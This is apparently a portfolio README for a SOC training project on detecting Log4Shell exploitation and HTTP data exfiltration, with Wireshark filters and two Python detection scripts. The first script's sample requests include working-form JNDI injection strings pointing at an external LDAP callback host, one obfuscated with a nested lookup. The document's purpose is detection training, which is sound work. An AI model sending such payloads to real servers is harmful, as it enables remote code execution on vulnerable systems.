This project demonstrates SOC-level log analysis and investigation skills using a simulated environment.
The focus is on detecting, investigating, and documenting two common attacker techniques involving HTTP traffic.
- Log4j vulnerability exploitation (Log4Shell)
- Data exfiltration over HTTP
All analysis was performed using anonymized training data adapted from SOC lab exercises.
👉 The completed SIEM Log Analysis Report can be downloaded via my cybersecurity blog, Happy Bytes
This repository contains cybersecurity learning exercises and defensive security analysis. The materials document investigations, threat hunting, or incident response scenarios for educational and portfolio purposes.
No malware, exploits, or offensive tooling are distributed in this repository. Any IP addresses, indicators, or artifacts are included strictly for analysis and educational demonstration.
- Wireshark
- Splunk
- CyberChef
- HTTP & network protocol analysis
Objective:
Identify exploitation attempts targeting Log4j via malicious HTTP requests.
Key Techniques:
- Inspection of HTTP headers and payloads
- Detection of JNDI injection patterns
- Decoding obfuscated strings using CyberChef
Within Wireshark, we can use common display filters to narrow the search, including:
- `http.request.method == "POST"`
- `(ip contains "jndi") or (ip contains "Exploit")`
- `(frame contains "jndi") or (frame contains "Exploit")`
- `(http.user_agent contains "$") or (http.user_agent contains "==")`
- Image 1: Using these filters, we identified a suspicious packet in Wireshark. Following the HTTP stream of that packet revealed the start of the Log4j attack phase; CyberChef was then used to decode and transform the obfuscated payload.
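As an added illustration (not part of the project's report or tooling), the Python script below applies the same two-stage approach in code: the broad string checks that the Wireshark filters above express, followed by a stricter matcher that first resolves Log4j's nested `${lower:...}` / `${...:-x}` substitutions, then extracts the JNDI callback and base64-decodes the path segment the way the report did in CyberChef. The requests, IP addresses and base64 string are constructed for the example.

```python
import base64
import re

# Constructed sample HTTP requests (not taken from the project's capture).
# The first is benign, the second carries a plain JNDI lookup in User-Agent
# with a base64 path segment, the third hides the lookup behind a nested
# ${lower:...} substitution so the literal string "jndi" never appears.
SAMPLE_REQUESTS = [
    {"method": "GET", "uri": "/index.html",
     "headers": {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64)"}},
    {"method": "POST", "uri": "/login",
     "headers": {"User-Agent": "${jndi:ldap://198.51.100.7:1389/Q29uc3RydWN0ZWQtc2FtcGxl}"}},
    {"method": "GET", "uri": "/api/v1/status",
     "headers": {"X-Api-Version": "${${lower:j}ndi:ldap://198.51.100.7/a}"}},
]

# Inner lookups that resolve to a literal: ${lower:x}, ${upper:x}, ${anything:-x}.
# ${upper:x} is replaced by x as-is; the JNDI matcher below is case-insensitive.
INNER_LOOKUP_RE = re.compile(r"\$\{(?:(?:lower|upper):|[^}$]*:-)([^}$]+)\}", re.IGNORECASE)
# A resolved JNDI lookup: scheme, callback host[:port], optional path.
JNDI_RE = re.compile(r"\$\{jndi:([a-z]+)://([^/}]+)(/[^}]*)?\}", re.IGNORECASE)


def normalize(value):
    """Repeatedly resolve inner lookups until the string stops changing."""
    prev = None
    while prev != value:
        prev = value
        value = INNER_LOOKUP_RE.sub(lambda m: m.group(1), value)
    return value


def try_base64(s):
    """Decode s as base64 if it looks like base64 and yields printable text, else None."""
    if len(s) < 8 or not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", s):
        return None
    try:
        raw = base64.b64decode(s + "=" * (-len(s) % 4), validate=True)
    except ValueError:
        return None
    text = raw.decode("utf-8", errors="replace")
    return text if text.isprintable() else None


def triage_filter(req):
    """Python analogue of the broad Wireshark filters above (case-insensitive here):
    cheap string checks over the whole request plus the '$' / '==' User-Agent heuristic."""
    blob = " ".join([req["method"], req["uri"], *req["headers"].values()]).lower()
    ua = req["headers"].get("User-Agent", "")
    return "jndi" in blob or "exploit" in blob or "$" in ua or "==" in ua


def analyze_request(req):
    """Return a finding dict for the first header holding a JNDI lookup, else None."""
    for name, value in req["headers"].items():
        m = JNDI_RE.search(normalize(value))
        if not m:
            continue
        path = (m.group(3) or "").lstrip("/")
        return {
            "method": req["method"], "uri": req["uri"], "header": name,
            "scheme": m.group(1).lower(), "callback": m.group(2),
            "decoded_path": try_base64(path),   # what CyberChef would show for the path
        }
    return None


def scan_requests(requests):
    """Run the precise matcher over every request and collect findings."""
    return [f for f in map(analyze_request, requests) if f is not None]


if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print("triage hit:", triage_filter(req), "| finding:", analyze_request(req))
```

The third sample is the instructive one: the broad `contains "jndi"` filter misses it because the obfuscation breaks up the literal string, while resolving the inner lookup first recovers `${jndi:` and the callback host.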
Objective:
Detect and analyze suspicious outbound HTTP traffic indicating possible data exfiltration.
Key Techniques:
- Packet-level inspection in Wireshark
- Event correlation and timeline analysis in Splunk
- Identification of abnormal request frequency and payload size
- Image 1: Using Splunk, we could isolate a POST request with a large payload (600+ bytes, in this example) for further investigation.
- Image 2: To correlate the findings, we isolated the suspicious packet in Wireshark and followed the HTTP stream to identify the exposed credentials and the data being exfiltrated to the external IP.
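As an added example (not the project's Splunk searches or data), this Python script reproduces the two exfiltration signals the case relies on over a constructed HTTP log: POST bodies at or above the 600-byte size mentioned above, and an abnormal request frequency to a single destination. The log lines, IP addresses and the burst thresholds are constructed or assumed for the example; only the 600-byte figure comes from the case itself.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample HTTP log (not the project's anonymized data). Columns:
# timestamp, source IP, destination IP, method, URI, request body bytes.
SAMPLE_LOG = """\
2024-03-01T10:00:01Z 10.0.0.15 203.0.113.20 GET /news 0
2024-03-01T10:00:03Z 10.0.0.15 203.0.113.20 POST /search 42
2024-03-01T10:00:10Z 10.0.0.22 198.51.100.9 POST /upload 1850
2024-03-01T10:00:12Z 10.0.0.22 198.51.100.9 POST /upload 1790
2024-03-01T10:00:14Z 10.0.0.22 198.51.100.9 POST /upload 1905
2024-03-01T10:00:16Z 10.0.0.22 198.51.100.9 POST /upload 1820
2024-03-01T10:00:18Z 10.0.0.22 198.51.100.9 POST /upload 1760
2024-03-01T10:05:00Z 10.0.0.31 203.0.113.20 POST /login 640
"""

LARGE_POST_BYTES = 600   # the case's example threshold for a "large payload"
BURST_COUNT = 5          # assumed: this many POSTs to one destination ...
BURST_WINDOW_S = 60      # ... within this many seconds counts as a burst


def parse_log(text):
    """Parse whitespace-separated log lines into event dicts; skip malformed lines."""
    events = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 6:
            continue
        ts, src, dst, method, uri, size = parts
        events.append({"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
                       "src": src, "dst": dst, "method": method,
                       "uri": uri, "bytes": int(size)})
    return events


def large_posts(events, threshold=LARGE_POST_BYTES):
    """Signal 1: POST requests whose body is at or above the size threshold."""
    return [e for e in events if e["method"] == "POST" and e["bytes"] >= threshold]


def burst_posts(events, count=BURST_COUNT, window_s=BURST_WINDOW_S):
    """Signal 2: sliding-window POST count per (src, dst); returns pairs reaching count."""
    by_pair = defaultdict(list)
    for e in events:
        if e["method"] == "POST":
            by_pair[(e["src"], e["dst"])].append(e["ts"])
    flagged = {}
    window = timedelta(seconds=window_s)
    for pair, stamps in by_pair.items():
        stamps.sort()
        start = 0
        for end in range(len(stamps)):
            while stamps[end] - stamps[start] > window:
                start += 1
            hits = end - start + 1
            if hits >= count:
                flagged[pair] = max(hits, flagged.get(pair, 0))
    return flagged


def summarize(events):
    """Per (src, dst): number of POSTs, total and largest POST body size."""
    summary = defaultdict(lambda: {"posts": 0, "total_bytes": 0, "max_bytes": 0})
    for e in events:
        if e["method"] != "POST":
            continue
        s = summary[(e["src"], e["dst"])]
        s["posts"] += 1
        s["total_bytes"] += e["bytes"]
        s["max_bytes"] = max(s["max_bytes"], e["bytes"])
    return dict(summary)


def findings(text):
    """Combine both signals into a ranked list of source/destination pairs to review."""
    events = parse_log(text)
    large_pairs = {(e["src"], e["dst"]) for e in large_posts(events)}
    bursts = burst_posts(events)
    summary = summarize(events)
    report = []
    for pair in large_pairs | set(bursts):
        reasons = []
        if pair in large_pairs:
            reasons.append(f"POST body >= {LARGE_POST_BYTES} bytes (max {summary[pair]['max_bytes']})")
        if pair in bursts:
            reasons.append(f"{bursts[pair]} POSTs within {BURST_WINDOW_S}s")
        report.append({"pair": pair,
                       "severity": "high" if len(reasons) == 2 else "review",
                       "total_bytes": summary[pair]["total_bytes"],
                       "reasons": reasons})
    # Pairs hitting both signals first, then by volume.
    report.sort(key=lambda f: (f["severity"] != "high", -f["total_bytes"]))
    return report


if __name__ == "__main__":
    for f in findings(SAMPLE_LOG):
        print(f["severity"].upper(), f["pair"], f["total_bytes"], "bytes;", "; ".join(f["reasons"]))
```

The single 640-byte login POST shows why size alone is only a starting point: it clears the threshold but is a one-off, so it is ranked for review rather than flagged, while the repeated uploads to one external host hit both signals and rise to the top.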
- Viewable on GitHub: SIEM Log Analysis Report (PDF)
- Detection queries
- Anonymized sample logs
- SIEM log analysis
- Network traffic investigation
- Threat detection & triage
- Incident documentation
- SOC-style remediation recommendations
Data used in this project is derived from simulated SOC lab environments and re-analyzed independently for educational and portfolio purposes.
Feel free to connect on LinkedIn or review my other security projects.
Feedback and discussion are welcome. Thank you for reviewing this project. 🙏